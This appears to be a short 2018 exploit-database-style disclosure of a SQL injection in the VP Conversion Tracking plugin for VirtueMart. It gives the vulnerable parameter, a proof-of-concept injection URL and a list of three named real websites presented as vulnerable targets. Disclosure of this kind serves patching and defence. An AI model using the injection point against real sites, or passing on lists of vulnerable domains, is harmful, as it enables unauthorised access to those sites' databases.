###################################################################### # Exploit Title: VP Conversion Tracking Plugin - SQL Injection Vulnerability # Google Dork: N/A # Date: 02.01.2018 # Author: Abde Ouabala (@AbdeOuabala) # url : https://www.virtueplanet.com/extensions/vp-conversion-tracking # Version : 1.7 # Tested on: BackBox Linux # ###################################################################### # # Description : plugin that helps you to track conversations of your Ads from all advertising platforms like Google AdWords, Facebook Ads, Shopper Approved Customer Survey, Bing Ads etc. # # # Vulnerable Parameter : virtuemart_category_id # # #POC: index.php?option=com_virtuemart&view=category&virtuemart_category_id=[SQL HERE(--)] # #Vuln Sites: http://demos.virtueplanet.com/vm3/index.php?option=com_virtuemart&view=category&virtuemart_category_id=3"'--&lang=en&Itemid=151 https://www.nordmograph.com/extensions/index.php?option=com_virtuemart&view=category&virtuemart_category_id=20--&Itemid=58 https://www.oread.eu/index.php?option=com_virtuemart&view=category&virtuemart_category_id=45-- ###################### # Discovered by : Abde Ouabala (https://www.facebook.com/Sh3ll.Inj3ctor) # Greetz : Gaa3 Lhbab ######################